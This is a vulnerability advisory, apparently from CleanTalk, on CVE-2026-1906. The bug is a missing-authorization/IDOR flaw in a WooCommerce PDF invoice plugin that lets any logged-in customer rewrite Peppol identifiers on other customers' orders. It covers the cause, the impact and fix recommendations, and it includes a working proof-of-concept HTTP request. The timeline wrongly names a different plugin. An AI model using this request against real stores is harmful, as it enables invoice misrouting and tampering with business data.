CVE-2026-1906 affects PDF Invoices and Packing Slips for WooCommerce and it is a broken access control vulnerability that allows an authenticated low privilege user to modify business critical EDI and Peppol identifiers for orders they do not own. The weakness sits in an AJAX handler that updates order meta and user meta based on an attacker supplied order_id and values payload. In real ecommerce deployments, those identifiers can determine where electronic invoices and structured business documents are delivered. When a customer can change them for other customers, the impact is not only data corruption. It can become misrouting of invoices and potential leakage of business documents to the wrong endpoint, which raises both integrity and confidentiality concerns in addition to operational disruption. With an install base around 300k plus, this is a high exposure class of issue for stores that enable invoice or e invoice flows.
| CVE | CVE-2026-1906 |
| Plugin Version | PDF Invoices & Packing Slips for WooCommerce <= 5.6.0 |
| All Time | 22 011 744 |
| Active installations | 300 000+ |
| Publicly Published | February 17, 2026 |
| Last Updated | February 17, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1906 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-pdf-invoices-packing-slips/pdf-invoices-packing-slips-for-woocommerce-560-missing-authorization-to-authenticated-subscriber-peppol-identifier-modification |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| January 23, 2026 | Plugin testing and vulnerability detection in the Unlimited Elements for Elementor have been completed |
| January 23, 2026 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| February 17, 2026 | Registered CVE-2026-1906 |
Discovery of the Vulnerability
The vulnerable endpoint is wp-admin/admin-ajax.php?action=wpo_ips_edi_save_order_customer_peppol_identifiers and the handler validates only a nonce like value intended for document generation, then proceeds to write attacker supplied identifiers into order meta fields such as _peppol_endpoint_id and _peppol_endpoint_eas and also into user meta for the customer associated with the order. The critical missing control is object level authorization. The handler does not call current_user_can for a privileged capability, and it does not check that the current user owns the referenced order_id. This turns the endpoint into an IDOR primitive where the order_id becomes the object reference the attacker can swap at will. The exploitation becomes much more practical in configurations where document link access is set to Logged in, because the access key used in document links is derived from a predictable nonce creation path and can be obtained by any logged in customer from their own My Account order view and then reused as the security parameter for the AJAX call.
Understanding of IDOR attack’s
IDOR in WooCommerce is a high risk pattern because order IDs are enumerable and orders are high value objects. Even if a customer cannot view another customer order details, the ability to update metadata tied to that order can still cause damage. In WordPress, a nonce is not an authorization decision. It is a request integrity token, and it must be paired with permission checks that bind the action to the correct actor and object. When plugins treat a shared action nonce as the only gate and accept an order_id from the client, they often unintentionally allow any logged in user to act on any order. In real world commerce operations, business identifiers like Peppol endpoints are used for routing structured documents, compliance records, and invoicing flows. A malicious customer can sabotage a competitor customer account by setting bogus identifiers, or redirect documents to an attacker controlled endpoint, or simply corrupt the store’s EDI data until administrators intervene. This is why the bug is not a minor settings issue. It is cross customer business data tamperingthrough an API that should never be callable without strict ownership checks.
Exploiting the IDOR Vulnerability
To exploit CVE-2026-1906, an attacker with Subscriber+ cookies:
POC:
1) Try to buy smth and create a order/invoice 2) Go to "My account" page in "Order" section 3) Find "access_key" nonce 4) Send following request with order_id which not yours POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=wc-orders&action=edit&id=314 Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1769323112%7Cj28CzYFDtCqltv9jDEbww4j4IsQFHOO25F2Qtq5D46P%7C6cd3ba05788bd8e84f12df6cb38e6a6bcbd8df13b65d40aa81700039a006e349; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1769323112%7Cj28CzYFDtCqltv9jDEbww4j4IsQFHOO25F2Qtq5D46P%7C034a22b027f4e75eaae8a6bd685d0ea3f1c16b47e9d73ca8b95820a1c35c90f1; spbc_secfw_ip_wl=adb2a133b016d4aeea259f85a613874f Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 173 Origin: http://127.0.0.1 Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=wpo_ips_edi_save_order_customer_peppol_identifiers&security=157d06d990&order_id=314&values[peppol_endpoint_id]=0191:ATTACKERSSSSSSSSS&values[peppol_endpoint_eas]=0191 5) To check edited fields. Try to Download "E-Invoice" of edited order_id____
The most serious outcome is misrouting of electronic invoices and structured EDI messages. If Peppol endpoint identifiers are used to route documents, an attacker can cause invoices to be delivered to the wrong recipient endpoint, which can expose business document data and create compliance issues. Even when misrouting does not leak full documents, corrupting endpoint identifiers can break invoicing flows, delay fulfilment, and create customer support incidents that are expensive to resolve. Another realistic scenario is broad data corruption through enumeration. Order IDs are typically sequential, so an attacker can iterate order_id values and poison many accounts quickly, especially if the access key is reusable across actions. This becomes an integrity and availability issue for back office operations because staff must identify and restore correct identifiers and potentially reissue documents. It is also a stealth risk. These changes can blend into normal system behavior and may not be noticed until invoices fail or are delivered incorrectly, which means attackers can create delayed impact sabotage that is hard to trace back.
Recommendations for Improved Security
The fix is to enforce strict object level authorization before any meta is updated. The handler must validate that the current user is allowed to modify the specified order. For customers that should mean verifying get_current_user_id matches the order customer user ID, and for administrators it should mean requiring a capability like manage_woocommerce. The security parameter should not be a generic nonce that any customer can reuse for unrelated administrative actions. If the endpoint is intended for admins only, it should be registered as a privileged AJAX action and should use a nonce that is only printed in admin contexts. If it is intended for customers, it must require an order specific token and verify ownership, not only login status. Input validation should also be tightened to ensure Peppol endpoint IDs match expected formats and are not applied globally without explicit permission. Store owners should update to a fixed version as soon as available, audit recent changes to Peppol related meta, and consider temporarily disabling E Invoice links in My Account if they are not required, because exposing action nonces to low privilege users increases the blast radius of authorization mistakes.
By taking proactive measures to address IDOR like CVE-2026-1906 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #IDOR #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website